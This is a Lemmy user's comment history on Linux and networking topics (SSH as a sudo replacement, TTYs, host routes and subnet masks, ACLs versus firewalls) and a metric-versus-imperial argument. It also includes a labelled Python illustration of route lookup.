  • PowerCrazy@lemmy.ml to Linux@lemmy.ml: SSH as a sudo replacement (English, 26 upvotes, 3 months ago)

    Seems novel. But from a security aspect, if OpenSSH has a security vulnerability that allows an unauthenticated user to log in, via whatever means, once you are in the system as a non-privileged user, you are now free to use the same vulnerability to get root.

    Basically this exercise is like using two locks that have the same key to open them. If the same key opens them, then a weakness in one is now a weakness in the other, so why bother with two identical locks?


  • PowerCrazy@lemmy.ml to Linux@lemmy.ml: How terminal works (English, 8 upvotes, 4 months ago)

    Hahaha. OK, sure, you win. Linux TTYs are absolutely not terminals. Sure they are called terminals, they are for all intents and purposes modern-day terminals with a long and storied history that directly links them to terminals from the 70’s, but since they aren’t a physical piece of hardware that electro-mechanically connects to a mainframe, obviously they aren’t really terminals and they should be called something else.






  • This isn’t actually correct. An IP address assignment for a host with an IP requires both the address and the subnet mask. One cannot be assigned without the other. Even more strictly speaking the address by itself isn’t useful to the network stack except as a destination, and isn’t used anywhere in the network stack of the host. There is always a subnet mask, sometimes the mask is assumed to be /32 (255.255.255.255), sometimes /24, whatever. But whenever you are talking about assigning an IP address to any IP speaker, it must include the mask.

    The routing table on every IP speaker will include at a minimum a single host-route. That is the IP of the system itself with a /32 mask and the configured interface of that IP. Whether it’s eth0, a bonded interface, a loopback etc.

    Once you have that single host route, additional routes can be added as needed. These routes require an address, a subnet, and a next-hop. The next hop can be a directly attached interface, or an IP that is reachable by another route in the host routing table.

    If you have only a host route, as OP has, then the system has no network knowledge, so there are no reachable next hop IPs. So you would have to use a directly connected interface, like the OP did. Once you tell the system 192.168.0.0/24 is reachable through that interface, then any IP Packets that have that network as their destination will use that interface with a source of the one IP it has. In the case of two servers connected back to back, assuming the other server knows where the source of the packet came from, there is no problem sending traffic back.

    So to answer the OP’s question, there is no difference between one host route, then a static route pointing to an interface, and just a directly connected interface with your server IP on it. They are two different routes that may have different administrative distances, but assuming you aren’t doing anything exotic, for all intents and purposes they are the same.

    If you are talking about layer2 concepts like broadcasts, the host-route configured server can still receive broadcasts, but only broadcasts with destination IP of 255.255.255.255, not scoped broadcasts like 192.168.0.255 since it will ignore all traffic that isn’t unscoped broadcast or a full match to its own IP address.
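
The routing behaviour described in the comment above, as an added illustration that is not part of the thread: a simplified Python model of longest-prefix lookup and of the /32 host's broadcast handling as the comment states it. The host address 192.168.0.10, the interface name `eth0` and all function names are assumptions made for the example.

```python
import ipaddress

LIMITED_BROADCAST = ipaddress.ip_address("255.255.255.255")

def routes_from_address(cidr, dev):
    """Routes implied by configuring an address with a mask on an interface:
    the /32 host route plus the connected network (identical for a /32)."""
    iface = ipaddress.ip_interface(cidr)
    host = ipaddress.ip_network(f"{iface.ip}/32")
    return [(net, dev) for net in {host, iface.network}]

def add_static(routes, prefix, dev):
    """Static route pointing at a directly attached interface (no next-hop IP)."""
    return routes + [(ipaddress.ip_network(prefix), dev)]

def lookup(routes, dst):
    """Longest-prefix match; returns (prefix, interface) or None if unreachable."""
    dst = ipaddress.ip_address(dst)
    matches = [(net, dev) for net, dev in routes if dst in net]
    return max(matches, key=lambda r: r[0].prefixlen, default=None)

def accepts(host_ip, dst):
    """Receive rule for the /32 host as described in the comment:
    only its own address or the unscoped broadcast is accepted."""
    dst = ipaddress.ip_address(dst)
    return dst == ipaddress.ip_address(host_ip) or dst == LIMITED_BROADCAST

# Constructed sample configurations (assumed values, not from the thread).
HOST = "192.168.0.10"
host_only = routes_from_address(f"{HOST}/32", "eth0")
host_plus_static = add_static(host_only, "192.168.0.0/24", "eth0")
connected = routes_from_address(f"{HOST}/24", "eth0")

if __name__ == "__main__":
    for name, table in [("host route only", host_only),
                        ("host route + static", host_plus_static),
                        ("connected /24", connected)]:
        print(f"{name:22} -> 192.168.0.20 via {lookup(table, '192.168.0.20')}")
    for dst in ("192.168.0.10", "192.168.0.255", "255.255.255.255"):
        print(f"/32 host accepts {dst}: {accepts(HOST, dst)}")
```
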




  • Right but if you want to start doing application level blocking, then the proper tool for the job is a stateful firewall and even better, a RADIUS/Kerberos system that authenticates every connection between servers.

    Basically I use ACLs to prevent spoofing attacks from originating out of my network, and also to lock down the management plane of my network devices to specific subnets. In all other cases a stateful firewall should be used exclusively.

    In any other case ACLs provide the illusion of security and create a huge amount of operational friction especially in a dynamic environment.


  • Only if you assume IP Addresses act as authentication for what that host is. But since they don't, I see ACLs as a security blanket.
    I can change the IP of a server I control and bypass any ACL easily. If I have control of my network as well, then no ACL you apply can stop any of my servers from hitting whatever server you have allowed any of my servers to hit. So why not just allow my entire network block?








  • PowerCrazy@lemmy.ml to Memes@lemmy.ml: Banana (English, 0 upvotes, 4 downvotes, 1 year ago)

    No, what you aren’t getting is that the measurement units are arbitrary. However the divisors for those units are what make the measurement system useful for people. If you are in construction it’s much more useful to deal with whole numbers than it is to deal with fractions. Hence if you want a third of a foot, you want 4", not .166666 of a Meter. If you are drinking beer you count by the number of glasses of beer whatever size those happen to be, you don’t count in Milliliters of beer. Measurements are supposed to be USEFUL to humans first and foremost, and moving a decimal to convert a unit to a different unit is trivial and can be done regardless of metric or not, and isn’t really useful.


  • PowerCrazy@lemmy.ml to Memes@lemmy.ml: Banana (0 upvotes, 4 downvotes, 1 year ago)

    A few nations have. The USSR, the US for Mars and several nations have crashed things into the moon, unintentionally, including Israel and India. So maybe the problem wasn’t the metric system and something a lot more meaningful instead of what specific arbitrary unit of measurement you think is “better.”

    e: Like look at this list: https://en.wikipedia.org/wiki/List_of_missions_to_Mars There are more failures than successes, and only one of those failures was because of different units used for two related measurements. It’s weird to even bring it up as a point about the metric system.


  • PowerCrazy@lemmy.ml to Memes@lemmy.ml: Banana (0 upvotes, 4 downvotes, 1 year ago)

    Decimals are absolutely not intuitive. Whole numbers are. If I say I have .473 liters of liquid how much is that? Sure it’s 473ml’s but how much is that? A lot? A little? Could you drink that much? Should you drink that much? If I say, let’s go have a pint of beer, then you would obviously say, sure, maybe two. The amount is the same, but the way you think about it is more important.

    By the way, 8 pints of beer is a gallon, so if you say I don’t want to drink a gallon of beer, you’ll know you should stop at 7 pints. But no one is going to say I can only drink 3.3 liters of beer tonight. They may say, I promised my wife no more than 7 beers (or 3, that number doesn’t matter), the point is you want to measure things in whole numbers for human-centric activities.